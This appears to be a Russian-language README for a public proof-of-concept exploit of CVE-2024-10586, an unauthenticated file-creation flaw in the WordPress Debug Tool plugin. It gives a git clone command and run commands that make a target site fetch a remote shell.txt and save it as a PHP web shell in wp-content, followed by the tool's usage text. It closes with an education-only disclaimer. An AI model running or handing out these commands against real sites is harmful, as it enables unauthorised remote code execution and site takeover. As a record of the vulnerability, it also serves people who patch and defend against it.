
Эксплойт proof-of-concept для CVE-2024-10586, нацеленный на плагин WordPress Debug Tool. Автоматизирует произвольную загрузку файлов, приводящую к удалённому выполнению кода через неаутентифицированные POST-запросы.
Описание
Плагин Debug Tool для WordPress уязвим к произвольному созданию файлов из-за отсутствия проверки прав доступа в функции dbt_pull_image() и отсутствия проверки типа файла во всех версиях до 2.2 включительно.
Это позволяет неаутентифицированным злоумышленникам создавать произвольные файлы, такие как .php файлы, которые могут быть использованы для удалённого выполнения кода.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Запустите скрипт следующей командой: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.